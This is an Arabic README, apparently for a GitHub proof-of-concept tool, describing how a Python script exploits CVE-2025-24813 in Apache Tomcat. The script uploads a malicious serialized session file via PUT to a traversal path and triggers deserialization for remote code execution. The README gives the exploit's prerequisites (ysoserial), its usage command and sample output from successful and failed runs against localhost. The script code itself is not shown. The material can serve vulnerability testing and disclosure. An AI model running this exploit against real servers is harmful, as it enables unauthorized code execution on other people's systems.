
هذا المستودع يحتوي على سكريبت آلي لإثبات المفهوم (PoC) لاستغلال **CVE-2025-24813**، وهي ثغرة تنفيذ عن بُعد (RCE) في Apache Tomcat. تسمح الثغرة للمهاجم برفع حمولة متسلسلة ضارة إلى الخادم، مما يؤدي إلى تنفيذ تعليمات برمجية عشوائية عبر إلغاء التسلسل (deserialization) عند توفر شروط معينة.
CVE-2025-24813 هي ثغرة RCE نظرية في Apache Tomcat تستفيد من المعالجة غير الصحيحة لملفات الجلسات المُرفعة وآليات إلغاء التسلسل. من خلال تحميل حمولة مُصممة إلى دليل قابل للكتابة (مثل /uploads/../sessions/)، يمكن للمهاجم تشغيل إلغاء التسلسل، مما يؤدي إلى تنفيذ أوامر عشوائية على الخادم الهدف.
لاستغلال هذه الثغرة بنجاح باستخدام هذا الإثبات، يجب توفر الشروط التالية:
/index.jsp) وتشغيل إلغاء تسلسل الحمولة.ysoserial أو ترجمة الحمولات القائمة على Java.ysoserial، فيجب أن يتوفر ملف ysoserial.jar محليًا.python CVE-2025-24813.py <target_url> [options]
[+] الخادم قابل للكتابة عبر PUT: http://localhost:8081/check.txt
[*] معرف الجلسة: absholi7ly
[+] تم إنشاء الحمولة بنجاح: payload.ser
[+] تم رفع الحمولة مع الحالة 409 (Conflict): http://localhost:8081/uploads/../sessions/absholi7ly.session
[+] نجح الاستغلال! عاد الخادم بـ 500 بعد إلغاء التسلسل.
[+] الهدف http://localhost:8081 ضعيف تجاه CVE-2025-24813!
[+] تم إزالة الملف المؤقت: payload.ser
[+] الخادم قابل للكتابة عبر PUT: http://localhost:8081/check.txt
[*] معرف الجلسة: absholi7ly
[+] تم إنشاء الحمولة بنجاح: payload.ser
[-] فشل رفع الحمولة: http://localhost:8081/uploads/../sessions/absholi7ly.session (HTTP 403)
[-] يبدو أن الهدف http://localhost:8081 غير ضعيف أو فشل الاستغلال.
[+] تم إزالة الملف المؤقت: payload.ser